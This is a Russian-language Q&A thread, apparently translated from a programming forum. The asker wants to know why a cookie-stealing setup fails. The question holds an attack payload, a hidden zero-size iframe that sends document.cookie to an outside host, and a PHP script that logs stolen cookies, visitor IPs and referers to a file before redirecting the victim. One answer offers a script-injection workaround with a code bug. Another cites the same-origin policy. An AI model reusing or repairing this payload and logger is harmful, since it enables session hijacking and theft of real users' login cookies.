Передача document.cookie в php из iframe в отдельном домене

Question

<IFRAME WIDTH=0 HEIGHT=0 frameborder=0 SRC=jvoid(document.location="http://www.xxx.com/cookie.php?c"+document.cookie)></iframe>

А затем php-файл:

<?php
$cookie = $_GET['c'];
$ip = getenv ('REMOTE_ADDR');
$date=date("j F, Y, g:i a");;
$referer=getenv ('HTTP_REFERER');
$fp = fopen('logs.html', 'a');
fwrite($fp, 'Cookie: '.$cookie.'< br > IP: ' .$ip. '< br > Date and Time: ' .$date. '< br > Referer: '.$referer.'< br > < br > < br >');
fclose($fp);
header ("Location: http://www.xxx.com");
?>

logs.html записывает все, кроме cookie - почему?Я проверил, что мой сайт корректно отображает файлы cookie, вызвав: document.cookie внутри тегов, чтобы что-то еще заработало.Пожалуйста, укажите на мою глупость!

Answer 1

почему вы хотите это сделать? В любом случае, я столкнулся с этой ссылкой: http://www.15seconds.com/issue/971108.htm давно назад ... посмотрите, полезно ли это вам

или вы можете попробовать это с помощью js следующим образом:

<script type="text/javascript">
   var script=document.createElement('script');
   script.setAttribute("type","text/javascript");
   script.setAttribute("src", 'http://xxx.com/ajaxHandler?getCookie&callback=passCookie');
   document.getElementsByTagName("head")[0].appendChild(newfile);
 </script>

И страница xxx.com/ajaxHandler?getCookie может сделать это:

 passCookie({'name':'mycookie', 'value':'myvalue'});

Answer 2

Я думаю, что это из-за той же политики происхождения.

В противном случае было бы слишком просто украсть чье-то печенье:)

http://en.wikipedia.org/wiki/Same_origin_policy